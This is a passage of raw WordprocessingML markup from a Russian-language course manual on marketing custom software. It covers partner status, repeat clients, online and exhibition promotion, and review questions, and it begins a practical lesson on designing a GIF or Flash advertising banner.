      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Альтернативой подобным рискам являются дополнительные услуги исполнителя по полному циклу проектирования программного продукта в требуемой предметной области. В данном случае эти риски неизбежно ложатся на исполнителя.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Вместе с тем исполнитель может компенсировать их, привлекая к подобным задачам квалифицированных специалистов и получая существенное вознаграждение за оказание этой услуги.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Партнерский статус</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наиболее эффективным решением для поиска потенциальных заказов в сфере разработки программного обеспечения является наличие статуса технологического партнера крупной компании, поставляющей со</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> оборудование или программного обеспечения, для покупателей которого в некоторых случаях необходимо оказать дополнительные услуги по адаптации. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Наличие партнерского статуса позволяет регулярно получать значительное количество заказов, при этом во многих случаях репутация исполнителя и набор предоставляемых услуг не будут учитываться.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Работа с постоянными клиентами</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Существенное внимание должно быть уделено работе с постоянными клиентами. Как правило, если клиент был удовлетворен результатами работы по проекту, подразумевающему разработку ПО под заказ, впоследствии он неоднократно обратится со следующими заказами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Это связано с тем, что как правило, компании, прибегающие к аутсорсингу разработки ПО не заинтересованы в увеличении собственных IT-подразделений, а их бизнес-задачи выходят за рамки возможностей стандартных программных продуктов от крупных производителей.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для привлечения постоянных клиентов к дальнейшему сотрудничеству возможно использование системы скидок на разработку продуктов и(или) дополнительные услуги, а также, например, использование увеличенных сроков бесплатного гарантийного обслуживания.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Информационная кампания в Интернет</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сеть Интернет является основным информационным ресурсом, к которому прибегает потенциальный заказчик в случае необходимости найти компанию для аутсорсинга, но при отсутствии контактов с конкретными компаниями. Основная задача информационной кампании в Интернет – привлечь внимание потенциального клиента, вызвать интерес представленными предложениями, убедить его позвонить или выслать по электронной почте краткую информацию о планируемом заказе.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Информационная кампания в сети Интернет может включать в себя:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>развертывание информационного Web-портала, предлагающего посетителям подробную информацию о компании, оказываемых услугах и производимых продуктах, а также информацию об известных клиентах компании.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>размещение тематической рекламы (например, спонсируемых ссылок в поисковых системах)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>размещение на сайте бесплатных утилит, фактически являющихся для клиента образцами качества продуктов, которые разрабатывает компания. (подход, применяемый компанией Pixelsoft)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Реклама услуг на выставках и форумах</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Специализированные выставки и форумы также позволяют провести рекламу предлагаемых услуг, распространить информационные материалы и демонстрационное программное обеспечение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Можно выделить две основных категории подобных мероприятий:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выставки, посвященные информационным технологиям и услугам в целом</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>пециализированные выставки (например, Бухгалтерский учет), на которых могут быть представлены конкретные решения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Несмотря на то, что в обоих случаях участие в выставке или форуме позволяет повысить узнаваемость компании и е</w:t>
      </w:r>
      <w:r w:rsidR="00D70A0A" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> услуг, мероприятия с узкой специализацией с представлением на них профильных решений являются более предпочтительными для поиска новых заказчиков.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Какие риски возможны со стороны разработчика программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие риски возможны со стороны заказчика программного обеспечения?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. Какие стратегии продвижения программного обеспечения вы знаете?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB3FFC" w:rsidRPr="00617AC0" w:rsidRDefault="00DB3FFC" w:rsidP="007755F7">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="206" w:name="_Toc507788267"/>
      <w:bookmarkStart w:id="207" w:name="_Toc507788542"/>
      <w:bookmarkStart w:id="208" w:name="_Toc26278748"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Практическое занятие № </w:t>
      </w:r>
      <w:r w:rsidR="002E7230" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Создание макета электронного баннера компании для продвижения программного обеспечения отраслевой направленности</w:t>
      </w:r>
      <w:bookmarkEnd w:id="206"/>
      <w:bookmarkEnd w:id="207"/>
      <w:bookmarkEnd w:id="208"/>
      <w:r w:rsidR="00C75797" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Цель: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>формирование навыков создания рекламной продукции.</w:t>
      </w:r>
      <w:r w:rsidR="00E73975" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Создание макета электронного баннера компании для продвижения программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Оборудование: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>персональный компьютер, программное обеспечение для работы с графикой.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E73975" w:rsidRPr="00617AC0" w:rsidRDefault="00E73975" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Предложить наиболее приемлемую стратегию продвижения программного продукта, согласно специфической ситуации варианта, и объяснить свою точку зрения и свой выбор. Исходные данные выдаются преподавателем в индивидуальном порядке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E73975" w:rsidRPr="00617AC0" w:rsidRDefault="00E73975" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Требования к отчету: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>письменный отчет, содержащий структурированный анализ ситуации на рынке и выбор наиболее выгодной стратегии продвижения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00F40D1D" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Основные теоретические сведения</w:t>
      </w:r>
      <w:r w:rsidR="00D84D30" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Современный интернет с его многообразием сайтов и сервисов совершенно немыслим без баннеров. Они есть практически на каждом сайте: от серьезного портала до домашней странички. Мигающие и статичные, большие и маленькие – мир баннерной рекламы не стоит на месте.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Одним из самых важных критериев, по которым баннеры отличаются друг от друга является технология изготовления, где два самых распространенных формата – gif и flash постоянно соревнуются в первенстве.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> расс</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мотр</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>им</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, что технологически представляют собой оба эти формата:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Gif (аббревиатура от английского </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>GraphicsInterchangeFormat</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - обмен или хранение графических изображений).</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Фактически gif-баннер - это архив, хранящий несколько сжатых изображений одновременно и воспроизводящий их в заранее установленном порядке кадр за кадром, создавая эффект анимации.</w:t>
      </w:r>
      <w:r w:rsidR="007755F7" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Изображение в gif-формате может быть выполнено только в стандартной палитре из 256 цветов, причем один из цветов можно задать прозрачным, что позволяет делать баннеры, адаптированные под фон сайта, на котором они показываются.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Flash-баннеры. Так называются изображения, выполненные в </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MacromediaFlash</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - мощном редакторе для создания анимации с использованием элементов программирования.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В общих чертах флэш-технология представляет собой процесс, где на изображение (готовое либо вновь созданное) накладываются разнообразные объекты (кадры): другие рисунки, текст и так далее, которым задаются определенные координаты движения – сценарии. Ход выполнения этого сценария и создает анимационный эффект. От частоты смены кадров для каждого объекта зависит скорость его движения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Есть возможность внедрения некоторых дополнительных настроек для разных объектов при выполнении того тили иного действия (например включение на странице музыки, запуск flash-ролика кликом мыши или изменение цвета, формы, положения при наведении курсора).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Все эти особенности формирования анимации напрямую влияют и на визуальное отображение баннеров gif и flash. Особенности заключаются в следующем:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В связи с ограничением палитры в 256 цветов не все оттенки, заявленные в исходном макете баннера, можно воплотить в этом формате. Если используемого цвета в этой палитре нет, то при сохранении он автоматически будет заменен на наиболее близкий по тону. Это неощутимо при выполнении баннеров с небольшим количеством оттенков и существенно сдерживает фантазию при попытке создать яркий рисунок. Но данный факт актуален лишь для изготовителей баннеров и незначителен для аудитории.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">При попытке оптимизировать изображение (то есть снизить вес баннера), гиф часто </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>покрывается</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> точками – пикселями, которые очень портят всю картину, но при определенном умении можно эти недостатки превратить в достоинства.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При использовании прозрачных элементов (фона и других) часто имеет место некорректная обработка краев, что создает лишние пиксели, в целом формируя ощущение неопрятности баннера, но при внимательном отношении к процессу баннерного изготовления, эти пиксели можно легко устранить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В баннерах гиф-формата всего несколько кадров (оптимально – не больше 5-6), так как каждый кадр – это самостоятельное изображение и вес картинки увеличивается пропорционально количеству этих изображений. Сменяются они чаще всего резко – один за другим, так как плавный переход требует увеличения количества кадров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84D30" w:rsidRPr="00617AC0" w:rsidRDefault="00D84D30" w:rsidP="007755F7">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
